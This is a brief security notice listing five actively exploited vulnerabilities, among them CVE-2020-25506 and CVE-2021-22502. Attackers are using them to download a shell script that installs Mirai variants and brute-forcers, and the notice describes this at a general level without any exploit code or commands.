Five known vulnerabilities are being actively exploited to serve a Mirai variant. These attacks are actively going on and upon successful exploitation, the attackers try to download a malicious shell script, which contains further infection behaviors such as downloading and executing Mirai variants and brute-forcers.
The exploitation of vulnerabilities being exploited include:
1. VisualDoor: SonicWall SSL-VPN Remote Command Injection Vulnerability
2. CVE-2020-25506: D-Link DNS-320 Firewall Remote Command Execution Vulnerability
3. CVE-2021-27561 and CVE-2021-27562: Yealink Device Management Pre-Auth ‘root’ Level Remote Code Execution Vulnerability
4. CVE-2021-22502: Micro Focus Operation Bridge Reporter (OBR) Remote Code Execution
5. CVE-2019-19356: Netis WF2419 Wireless Router Remote Code Execution Vulnerability